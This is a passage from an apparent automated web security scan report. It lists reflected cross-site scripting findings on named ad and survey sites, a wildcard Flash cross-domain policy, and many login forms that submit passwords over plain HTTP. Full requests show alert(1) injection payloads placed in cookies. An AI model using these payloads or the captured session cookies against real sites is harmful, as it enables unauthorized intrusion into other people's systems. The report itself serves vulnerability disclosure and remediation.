Cookie: ruid=fc7a5"-alert(1)-"f5272ad3817; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; au=GIP9HWY4-MADS-10.208.38.239; ses15=4762^2; csi15=3188204.js^1^1294536315^1294536315; rpb=4210%3D1%264214%3D1; put_1197=3271971346728586924; cd=false

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:25:47 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 03:25:47 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 09-Jan-2011 03:25:47 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=4762^1; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=106452; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3156581.js^1^1294539947^1294539947; expires=Sun, 16-Jan-2011 02:25:47 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2288

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3156581"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=fc7a5"-alert(1)-"f5272ad3817\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.711. http://www.e00.peanutlabs.com/js/iFrame/index.php [pl_lang cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.e00.peanutlabs.com
Path:	/js/iFrame/index.php

Issue detail

The value of the pl_lang cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca65a"%3balert(1)//bb0a3c82748 was submitted in the pl_lang cookie. This input was echoed as ca65a";alert(1)//bb0a3c82748 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /js/iFrame/index.php?userId=998826224-3432-8939b981e2 HTTP/1.1
Host: www.e00.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; pl_lang=ca65a"%3balert(1)//bb0a3c82748; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-control: no-cache="set-cookie"
Content-Type: text/html
Date: Sun, 09 Jan 2011 02:31:56 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
Set-Cookie: dob=deleted; expires=Sat, 09-Jan-2010 02:31:55 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: sex=deleted; expires=Sat, 09-Jan-2010 02:31:55 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_email=deleted; expires=Sat, 09-Jan-2010 02:31:55 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: AWSELB=052955471CE77557C5059B093FDB80564CA14D6917E97B67B5A5E4D3EB1494CA107BC4756C9D1E7917A75869111F0EAA4A056867F2254F716FAB6B9BD336486E7AB4FDD4D1;MAX-AGE=600
Vary: Accept-Encoding,User-Agent
Connection: keep-alive
Content-Length: 112633

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

       <!-- If
...[SNIP]...
.peanutlabs.com/js/iFrame/stylesheet/custom/pogo/pogo_subscriptions.css"/>');
           document.write(unescape("%3Cscript src='http://static.e00.peanutlabs.com/js/iFrame/iFrame-js.cssx?publisherId=3432&lang=ca65a";alert(1)//bb0a3c82748.UTF&ref=82' type='text/javascript'%3E%3C/script%3E"));
   </script>
...[SNIP]...

3.712. http://www.peanutlabs.com/userGreeting.php [pl_lang cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/userGreeting.php

Issue detail

The value of the pl_lang cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ec9f"%3balert(1)//da7bb47d018 was submitted in the pl_lang cookie. This input was echoed as 2ec9f";alert(1)//da7bb47d018 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /userGreeting.php HTTP/1.1
Host: www.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sex=deleted; pl_email=test4%40fastdial.net; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_lang=2ec9f"%3balert(1)//da7bb47d018; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; ext_cid=deleted; dob=deleted; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; pl_profile=deleted; __utmc=184043431; __utmb=184043431.2.10.1294536629;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:05:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: dob=deleted; expires=Sat, 09-Jan-2010 03:05:24 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: sex=deleted; expires=Sat, 09-Jan-2010 03:05:24 GMT; path=/; domain=.peanutlabs.com
Vary: Accept-Encoding,User-Agent
Content-Length: 4073
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

       <!-- If
...[SNIP]...
sherId=&ref=60&customCSS=' type='text/css'%3E%3C/link%3E"));
           //document.write('');
           document.write(unescape("%3Cscript src='http://static.peanutlabs.com/js/iFrame/iFrame-js.cssx?publisherId=&lang=2ec9f";alert(1)//da7bb47d018.UTF&ref=82' type='text/javascript'%3E%3C/script%3E"));
   </script>
...[SNIP]...

4. Flash cross-domain policy previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://activity.livefaceonweb.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.1
Host: activity.livefaceonweb.com
Proxy-Connection: keep-alive
Referer: http://www.toprewardscentral.com/mindquiz_flv/lfow.swf?lfID=100002004&cOMW=0&cOMURL=http%3A//www.livefaceonweb.com&cOMWP=0&tDLB=0&tDLA=0&fIE=1&fIET=1&fIEP=1&fOE=1&fOET=1&pBBE=0&pBBBOF=0&pBAE=0&pBAOF=0&sFRAME=0&pBuffer=30&lfAffiliateID=2&sURL_Site=http%3A//www.theiq-quiz.com/hv1iqqz/MjAxMTAxMDgtMTczLjE5My4yMTQuMjQz/index.php%3Fweb_id%3DCD99%26exitpops%3D9175
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 18 Feb 2010 19:27:08 GMT
Accept-Ranges: bytes
ETag: "f019885cd0b0ca1:0"
Server: Microsoft-IIS/7.0
Date: Sun, 09 Jan 2011 01:34:43 GMT
Content-Length: 199

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

5. Cleartext submission of password previous next
There are 24 instances of this issue:

http://activity.livefaceonweb.com/
http://diythemes.com/thesis/
http://mail.cmsinter.net/Login.aspx
http://malsup.com/jquery/form/
http://malsup.com/jquery/form/
http://malsup.com/jquery/form/
http://malsup.com/jquery/form/
http://malsup.com/jquery/form/
http://malsup.com/jquery/form/
http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html
http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html
http://revver.com/video/426755/peanut-labs/
http://themeforest.net/user/freshface/portfolio
http://wordpress.org/extend/plugins/wp-pagenavi/
http://www.43things.com/person/
http://www.facebook.com/
http://www.mlive.com/
http://www.onestat.com/
http://www.peanutlabs.com/adminLogin.php
http://www.pogo.com/
http://www.pogo.com/account/verify-password.do
http://www.pogo.com/action/pogo/lightregview.do
http://www.rockband.com/
http://www.xanga.com/

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

5.1. http://activity.livefaceonweb.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://activity.livefaceonweb.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://activity.livefaceonweb.com/default.aspx

The form contains the following password field:

txtPass

Request

GET / HTTP/1.1
Host: activity.livefaceonweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Date: Sun, 09 Jan 2011 02:02:02 GMT
Connection: close
Content-Length: 2896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
::Live Fa
...[SNIP]...
<body>
<form name="frmLogin" method="post" action="default.aspx" id="frmLogin">
<div>
...[SNIP]...
<td align="left">
<input name="txtPass" type="password" id="txtPass" class="controlTextL" style="width:150px;" /></td>
...[SNIP]...

5.2. http://diythemes.com/thesis/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://diythemes.com
Path:	/thesis/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://diythemes.com/amember/login.php

The form contains the following password field:

amember_pass

Request

GET /thesis/ HTTP/1.1
Host: diythemes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.3. http://mail.cmsinter.net/Login.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mail.cmsinter.net
Path:	/Login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://mail.cmsinter.net/Login.aspx

The form contains the following password field:

txtPassword

Request

GET /Login.aspx HTTP/1.1
Host: mail.cmsinter.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=215573381.1294526267.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215573381.1031492532.1294526267.1294526267.1294526267.1; __utmc=215573381; __utmb=215573381.3.10.1294526267; authCookie=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 09 Jan 2011 01:21:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: authCookie=; expires=Tue, 12-Oct-1999 04:00:00 GMT; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 8153

<!DOCTYPE HTML PUBLIC "-//W3C//Dtd HTML 4.0 transitional//EN" >
<html>
<head>
       <title>Login</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="C#"
...[SNIP]...
<body onload="CheckForParent(); SetFocus()">
       <form name="login" method="post" action="Login.aspx" id="login">
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
...[SNIP]...
<td style="HEIGHT: 21px"><input name="txtPassword" type="password" id="txtPassword" onkeypress="return stopEnter()" onfocus="ClearPassword()" tabIndex="4" maxlength="31" class="inputTextMedToLarge" /></td>
...[SNIP]...

5.4. http://malsup.com/jquery/form/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://malsup.com/jquery/form/dummy.php

The form contains the following password field:

password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:51 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</h3>
<form id="validateForm3" action="dummy.php" method="post"><div>
...[SNIP]...
<input type="text" name="username" />
Password: <input type="password" name="password" />
<input type="submit" value="Submit" />
...[SNIP]...

5.5. http://malsup.com/jquery/form/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://malsup.com/jquery/form/dummy2.php

The form contains the following password field:

Password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.6. http://malsup.com/jquery/form/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://malsup.com/jquery/form/dummy.php

The form contains the following password field:

password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:51 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</h3>
<form id="validateForm1" action="dummy.php" method="post"><div>
...[SNIP]...
<input type="text" name="username" />
Password: <input type="password" name="password" />
<input type="submit" value="Submit" />
...[SNIP]...

5.7. http://malsup.com/jquery/form/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://malsup.com/jquery/form/dummy.php

The form contains the following password field:

Password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.8. http://malsup.com/jquery/form/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://malsup.com/jquery/form/dummy.php

The form contains the following password field:

Password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.9. http://malsup.com/jquery/form/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://malsup.com/jquery/form/dummy.php

The form contains the following password field:

password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:51 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</h3>
<form id="validateForm2" action="dummy.php" method="post"><div>
...[SNIP]...
<input type="text" name="username" />
Password: <input type="password" name="password" />
<input type="submit" value="Submit" />
...[SNIP]...

5.10. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://online.wsj.com
Path:	/article/SB10001424052748704415104576066830729058232.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html

The form contains the following password fields:

passwordReg
passwordConfirmationReg

Request

GET /article/SB10001424052748704415104576066830729058232.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:21:36 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=aa545813-1265-4e4a-a92e-4927fb4c2e16; domain=.wsj.com; path=/; Expires=Tue Jan 05 20:21:36 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST
Cache-Control: max-age=15
Expires: Sun, 09 Jan 2011 01:21:51 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=46
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 139880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<form name="freeRegistration_form" id="freeRegistration_form" action="" method="post" accept-charset="utf-8" onsubmit="return false;">
<ul class="regForms">
...[SNIP]...
</label>
<input type="password" name="passwordReg" value="" id="passwordReg" maxlength='15' class="text" />
</div>
...[SNIP]...
</label>

<input type="password" name="passwordConfirmationReg" value="" id="passwordConfirmationReg" maxlength='15' class="text" />
</div>
...[SNIP]...

5.11. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://online.wsj.com
Path:	/article/SB10001424052748704415104576066830729058232.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://commerce.wsj.com/auth/submitlogin

The form contains the following password field:

password

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:21:36 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=aa545813-1265-4e4a-a92e-4927fb4c2e16; domain=.wsj.com; path=/; Expires=Tue Jan 05 20:21:36 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST
Cache-Control: max-age=15
Expires: Sun, 09 Jan 2011 01:21:51 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=46
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 139880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</h4>

<form action="http://commerce.wsj.com/auth/submitlogin" id="login_form" name="login_form" method="post" onsubmit="suppress_popup=true;return true;">
<fieldset>
...[SNIP]...
</label>
<input type="password" name="password" id="login_password" class="login_pswd" tabindex="2" value="" maxlength="30"/>
<input type="hidden" name="url" id="page_url" value=""/>
...[SNIP]...

5.12. http://revver.com/video/426755/peanut-labs/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://revver.com
Path:	/video/426755/peanut-labs/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://revver.com/account/login/?next=/video/426755/peanut-labs/

The form contains the following password field:

password

Request

GET /video/426755/peanut-labs/ HTTP/1.1
Host: revver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:32:22 GMT
Server: Apache/2.0.55 (Ubuntu) mod_python/3.1.4 Python/2.4.3
Expires: Sun, 09 Jan 2011 02:33:33 GMT
Vary: Cookie
Last-Modified: Sun, 09 Jan 2011 02:28:33 GMT
ETag: b8fdf6d76062d0f9cc23a77e2e8edebb
Cache-Control: max-age=300
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 81237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<div class="login-form-area">
<form action="/account/login/?next=/video/426755/peanut-labs/" autocomplete="off" method="post">
<ul class="inline-form clearfix" style="">
...[SNIP]...
</label> <input id="password" name="password" type="password" /></li>
...[SNIP]...

5.13. http://themeforest.net/user/freshface/portfolio previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themeforest.net
Path:	/user/freshface/portfolio

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://themeforest.net/signin/authenticate

The form contains the following password field:

password

Request

GET /user/freshface/portfolio HTTP/1.1
Host: themeforest.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 09 Jan 2011 02:28:47 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "7d3f05bdfbd104cc41cd574e20733696"
X-Runtime: 174
Content-Length: 34838
Set-Cookie: referring_user=-1; domain=.themeforest.net; path=/; expires=Sat, 09-Apr-2011 03:28:47 GMT
Set-Cookie: _fd_session=BAh7BzoUcG9zdF9zaWduaW5fdXJsIjRodHRwOi8vdGhlbWVmb3Jlc3QubmV0L3VzZXIvZnJlc2hmYWNlL3BvcnRmb2xpbzoPc2Vzc2lvbl9pZCIlMjE0MjRhNzMxMWQ0MzcxMGU2YzU3ODY1MDNjM2EzOGQ%3D--d7f2ff8f0d287190348429cb42e2ca4e35b99358; path=/; expires=Tue, 08-Jan-2013 14:28:47 GMT; HttpOnly
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link href="h
...[SNIP]...
<div id="user-bar">

<form action="/signin/authenticate" method="post">
<a href="/signup" class="sprite input-link-dark">
...[SNIP]...
<input id="username" name="username" type="text" class="signinbar-input" value="username" onclick="this.value = ''"/>
<input id="password" name="password" type="password" class="signinbar-input" value="123456" onfocus="this.value = ''" onclick="this.value = ''"/>
<button class="submit-button-dark" type="submit">
...[SNIP]...

5.14. http://wordpress.org/extend/plugins/wp-pagenavi/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wordpress.org
Path:	/extend/plugins/wp-pagenavi/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://wordpress.org/extend/plugins/bb-login.php

The form contains the following password field:

password

Request

GET /extend/plugins/wp-pagenavi/ HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 09 Jan 2011 02:29:20 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 23436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profil
...[SNIP]...
</h2>

       <form class="login" method="post" action="http://wordpress.org/extend/plugins/bb-login.php">
<p>
...[SNIP]...
<label>Password        <input class="text" name="password" type="password" id="password" size="13" maxlength="40" />
   </label>
...[SNIP]...

5.15. http://www.43things.com/person/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.43things.com
Path:	/person/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.43things.com/auth/login

The form contains the following password field:

person[password]

Request

GET /person/ HTTP/1.1
Host: www.43things.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 01:38:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4
X-Runtime: 0.00959
Cache-Control: no-cache
